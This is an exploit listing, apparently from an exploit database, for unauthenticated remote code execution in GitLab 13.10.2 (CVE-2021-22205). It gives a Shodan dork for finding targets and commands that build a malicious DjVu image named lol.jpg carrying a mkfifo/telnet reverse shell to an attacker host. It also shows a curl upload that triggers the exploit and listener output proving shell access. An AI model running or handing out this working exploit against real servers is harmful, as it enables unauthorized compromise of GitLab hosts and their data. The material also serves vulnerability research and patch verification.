Share
## https://sploitus.com/exploit?id=PACKETSTORM:164994
# Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)  
# Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22  
# Date: 11/01/2021  
# Exploit Author: Jacob Baines  
# Vendor Homepage: https://about.gitlab.com/  
# Software Link: https://gitlab.com/gitlab-org/gitlab  
# Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8  
# Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu)  
# CVE : CVE-2021-22205  
# Vendor Advisory: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/  
# Root Cause Analysis: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed  
  
Code execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps. First generating the payload and then sending it.  
  
1. Generating the payload. This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270.  
  
echo -e  
"QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs="  
| base64 -d > lol.jpg  
echo -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg  
echo -n  
"fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg=="  
| base64 -d >> lol.jpg  
  
2. Sending the payload. Any random endpoint will do.  
  
curl -v -F 'file=@lol.jpg' http://10.0.0.7/$(openssl rand -hex 8)  
  
2a. Sample Output from the reverse shell:  
  
$ nc -lnvp 1270  
Listening on [0.0.0.0] (family 0, port 1270)  
Connection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport  
34836)  
whoami  
git  
id  
uid=998(git) gid=998(git) groups=998(git)